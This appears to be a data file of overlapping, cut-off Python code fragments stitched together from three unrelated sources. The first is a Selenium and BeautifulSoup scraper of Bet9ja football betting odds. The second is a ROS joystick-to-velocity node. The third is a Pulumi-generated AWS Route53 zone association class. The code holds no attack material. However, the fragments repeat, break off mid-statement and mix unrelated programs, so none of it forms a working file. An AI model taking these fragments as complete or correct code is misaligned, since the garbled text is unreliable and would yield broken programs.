"'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i",
"import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from",
"or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile:",
"json import re from pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode",
"soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in upper: title",
"data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data,",
"' + away_team info_2['match'] = home_team + ' vs ' + away_team info_1['time']",
"open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds,",
"{} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] =",
"= each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li',",
"json_file: global data data = json.load(json_file) for e in data: for a in",
"[] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data =",
"= len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index",
"soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t",
"if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll",
"data data = json.load(json_file) for e in data: for a in data[e]['submenu']: u",
"Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for",
"bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): #",
"id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu",
"Compile info_1 = {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team",
"= {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data",
"data = json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) # Wait",
"break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5",
"HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion >",
"as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web",
"Wait 5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight'))",
"getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/' # link Object links",
"e info_1['match'] = home_team + ' vs ' + away_team info_2['match'] = home_team",
"= BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper",
"BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites",
"elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info_1 =",
"= t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save",
"i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break #",
"range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB",
"5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for",
"Single Chance def DS_chance(): # Odds s_odds = [] d_odds = [] #",
"Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser =",
"u = e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace(' ',",
"DNB def DNB(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt',",
"= a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:] # full link",
"+ u + v + w # Gather links links[a['title']] = fl #",
"============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions",
"links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for e",
"in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"DNB(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as",
"= i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() #",
"Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5)",
"in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll",
"links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds",
"f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e #",
"with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for e in",
"= json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) # Wait 5",
"'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance",
"in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) #",
"i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait",
"range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG",
"# Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for",
"= each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs"
] |
[
"#!/usr/bin/env python import rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle",
"import rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False",
"twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False",
"to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) #",
"everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub",
"control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick",
"Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub",
"rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False def",
"import Joy toggle = False def callback(data): global toggle twist = Twist() twist.linear.x",
"0 pub.publish(twist) toggle = False # Intializes everything def start(): # publishing to",
"= Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] ==",
"Twist from sensor_msgs.msg import Joy toggle = False def callback(data): global toggle twist",
"1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y =",
"pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0",
"1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x =",
"= -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle",
"False def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y =",
"= 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle =",
"subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the",
"from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False def callback(data):",
"\"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed",
"to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node",
"import Twist from sensor_msgs.msg import Joy toggle = False def callback(data): global toggle",
"pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\"",
"= False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control",
"toggle = False def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1]",
"= 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False #",
"Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback)",
"def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0]",
"callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z",
"to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to",
"== 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y",
"True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z =",
"# subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts",
"rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__ == '__main__':",
"twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything",
"turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs",
"publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)",
"global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z =",
"inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin()",
"toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0",
"\"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__ ==",
"twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything def start(): #",
"Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1):",
"global pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on",
"geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle = False def callback(data): global",
"elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist)",
"pub.publish(twist) toggle = False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\"",
"twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4]",
"= 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x",
"twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist)",
"pub pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic",
"sensor_msgs.msg import Joy toggle = False def callback(data): global toggle twist = Twist()",
"toggle = False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to",
"rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy,",
"= False def callback(data): global toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y",
"== True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle",
"joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy')",
"start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel',",
"Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__ == '__main__': start()",
"on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if",
"python import rospy from geometry_msgs.msg import Twist from sensor_msgs.msg import Joy toggle =",
"-1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle ==",
"1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True",
"0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything def start():",
"toggle twist = Twist() twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3]",
"twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True):",
"= True pub.publish(twist) elif(toggle == True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z",
"# Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global",
"twist.linear.x = 1.5*data.axes[1] twist.linear.y = -1.5*data.axes[0] twist.angular.z = 1.5*data.axes[3] if(data.buttons[4] == 1): toggle",
"True): twist.linear.x = 0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle =",
"0 twist.linear.y = 0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes",
"def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub =",
"from sensor_msgs.msg import Joy toggle = False def callback(data): global toggle twist =",
"if(data.buttons[4] == 1): toggle = True pub.publish(twist) elif(toggle == True): twist.linear.x = 0",
"= 0 pub.publish(twist) toggle = False # Intializes everything def start(): # publishing",
"Joy toggle = False def callback(data): global toggle twist = Twist() twist.linear.x =",
"queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) #",
"= 0 twist.angular.z = 0 pub.publish(twist) toggle = False # Intializes everything def",
"topic \"joy\" rospy.Subscriber(\"joy\", Joy, callback) # starts the node rospy.init_node('Xbox360Joy') rospy.spin() if __name__",
"= rospy.Publisher('/cmd_vel', Twist, queue_size=10) # subscribed to joystick inputs on topic \"joy\" rospy.Subscriber(\"joy\",",
"False # Intializes everything def start(): # publishing to \"turtle1/cmd_vel\" to control turtle1",
"# publishing to \"turtle1/cmd_vel\" to control turtle1 global pub pub = rospy.Publisher('/cmd_vel', Twist,"
] |
[
"<reponame>master-coro/gantt-trampoline import sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) )",
") ) ) from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace",
"sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse",
"help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the",
"tpl static info json file\") args = parser.parse_args() generator = TraceGenerator(args.tpl_path, args.trace_path) generator.printTrace()",
"to the tpl static info json file\") args = parser.parse_args() generator = TraceGenerator(args.tpl_path,",
"path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import",
"import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path',",
"os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import",
"default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register",
"path to the tpl static info json file\") args = parser.parse_args() generator =",
"a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json",
"from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline",
"path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to",
"argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register",
"from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace",
"the path to the tpl static info json file\") args = parser.parse_args() generator",
"the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl",
"import sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )",
"the tpl static info json file\") args = parser.parse_args() generator = TraceGenerator(args.tpl_path, args.trace_path)",
"sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from",
") ) from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from",
"parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the",
"parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json file\")",
"help=\"Register the path to the tpl static info json file\") args = parser.parse_args()",
"file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json",
"trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static",
"path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse parser =",
"path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print",
"trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the",
"the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path",
"application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path',",
"from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks",
") from lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a",
"import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json',",
"= argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path",
"type=str, default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json',",
"to the trace json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the",
"argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to",
"Trampoline application.\") parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json file\")",
"TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\") parser.add_argument('--trace_path', type=str,",
"default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json file\") args =",
"type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info json file\") args",
"lib.Tasks import TraceGenerator import argparse parser = argparse.ArgumentParser(description=\"Print trace from a Trampoline application.\")",
"path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator import argparse parser",
"import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from lib.Tasks import TraceGenerator",
"parser.add_argument('--trace_path', type=str, default='data/trace.json', help=\"Register the path to the trace json file\") parser.add_argument('--tpl_path', type=str,",
"json file\") parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help=\"Register the path to the tpl static info"
] |
[
"not edit by hand unless you're certain you know what you are doing!",
"not isinstance(resource_name, str): raise TypeError('Expected resource name to be a string') if opts",
"of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None:",
"you are doing! *** import json import warnings import pulumi import pulumi.runtime from",
"to associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's",
"deprecated\", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn(\"explicit use of",
"__opts__ is deprecated, use 'opts' instead\", DeprecationWarning) opts = __opts__ if not resource_name:",
"str): raise TypeError('Expected resource name to be a string') if opts and not",
"pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict()",
"pulumi.Input[str] zone_id: The private hosted zone to associate. \"\"\" if __name__ is not",
"__name__ is not None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name =",
"is not None: warnings.warn(\"explicit use of __opts__ is deprecated, use 'opts' instead\", DeprecationWarning)",
"*** # *** Do not edit by hand unless you're certain you know",
"explicit association ordering is required (e.g. a separate cross-account association authorization), usage of",
"to be a ResourceOptions instance') __props__ = dict() if vpc_id is None: raise",
"zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of",
"and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance')",
"'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self, prop):",
"resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone",
"property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__( 'aws:route53/zoneAssociation:ZoneAssociation', resource_name, __props__, opts) def translate_output_property(self,",
"to the region of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private",
"def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or",
"[lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations",
"string') if opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be",
"None: warnings.warn(\"explicit use of __name__ is deprecated\", DeprecationWarning) resource_name = __name__ if __opts__",
"optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the",
"pulumi.Output[str] \"\"\" The VPC to associate with the private hosted zone. \"\"\" vpc_region:",
"[`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use those",
"of the AWS provider. \"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to",
"vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with the private hosted zone. \"\"\"",
"ID otherwise it will cause a perpetual difference in plan output. You can",
"region. Defaults to the region of the AWS provider. :param pulumi.Input[str] zone_id: The",
"standalone Zone VPC Association resource and exclusive VPC associations defined in-line in the",
"pulumi import pulumi.runtime from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\"",
"\"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a",
"vpc_id: The VPC to associate with the private hosted zone. :param pulumi.Input[str] vpc_region:",
"(tfgen) Tool. *** # *** Do not edit by hand unless you're certain",
"pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of the AWS provider.",
"= __opts__ if not resource_name: raise TypeError('Missing resource name argument (for URN creation)')",
"name argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name",
"__init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted",
"vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id",
"use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone`",
"in conjunction with this resource and the same zone ID otherwise it will",
"# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen)",
"be made on private zones. > **NOTE:** Unless explicit association ordering is required",
"At this time, you cannot use those in-line VPC associations in conjunction with",
"this resource is not recommended. Use the `vpc` configuration blocks available within the",
"the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource",
"can only be made on private zones. > **NOTE:** Unless explicit association ordering",
"**NOTE:** Terraform provides both this standalone Zone VPC Association resource and exclusive VPC",
"vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC",
"pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone. :param pulumi.Input[str]",
"pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None,",
"Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via",
"from .. import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to",
"vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to the region of the AWS",
"a Route53 Hosted Zone VPC association. VPC associations can only be made on",
"difference in plan output. You can optionally use the generic Terraform resource [lifecycle",
"this resource and the same zone ID otherwise it will cause a perpetual",
"\"\"\" zone_id: pulumi.Output[str] \"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__,",
"__props__, opts) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return",
"the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region. Defaults to",
"certain you know what you are doing! *** import json import warnings import",
"usage of this resource is not recommended. Use the `vpc` configuration blocks available",
"resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone.",
"zone_id=None, __name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations",
"cannot use those in-line VPC associations in conjunction with this resource and the",
"hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None,",
"resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(resource_name, str):",
"property 'vpc_id'\") __props__['vpc_id'] = vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise",
"to manage additional associations via this resource. :param str resource_name: The name of",
"authorization), usage of this resource is not recommended. Use the `vpc` configuration blocks",
"of this resource is not recommended. Use the `vpc` configuration blocks available within",
"in-line VPC associations in conjunction with this resource and the same zone ID",
"argument (for URN creation)') if not isinstance(resource_name, str): raise TypeError('Expected resource name to",
"manage additional associations via this resource. :param str resource_name: The name of the",
"__name__=None, __opts__=None): \"\"\" Manages a Route53 Hosted Zone VPC association. VPC associations can",
"the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted",
"if not resource_name: raise TypeError('Missing resource name argument (for URN creation)') if not",
"= vpc_id __props__['vpc_region'] = vpc_region if zone_id is None: raise TypeError(\"Missing required property",
"resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use those in-line",
"Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless",
"\"\"\" The private hosted zone to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None,",
"you're certain you know what you are doing! *** import json import warnings",
"zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] = zone_id super(ZoneAssociation, __self__).__init__(",
"raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() if",
"associate with the private hosted zone. \"\"\" vpc_region: pulumi.Output[str] \"\"\" The VPC's region.",
"> **NOTE:** Terraform provides both this standalone Zone VPC Association resource and exclusive",
"know what you are doing! *** import json import warnings import pulumi import",
"You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes`",
"import utilities, tables class ZoneAssociation(pulumi.CustomResource): vpc_id: pulumi.Output[str] \"\"\" The VPC to associate with",
"you cannot use those in-line VPC associations in conjunction with this resource and",
"opts and not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions",
"= vpc_region if zone_id is None: raise TypeError(\"Missing required property 'zone_id'\") __props__['zone_id'] =",
"to associate. \"\"\" def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None): \"\"\"",
"configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead. > **NOTE:** Terraform provides both",
"Options for the resource. :param pulumi.Input[str] vpc_id: The VPC to associate with the",
"a ResourceOptions instance') __props__ = dict() if vpc_id is None: raise TypeError(\"Missing required",
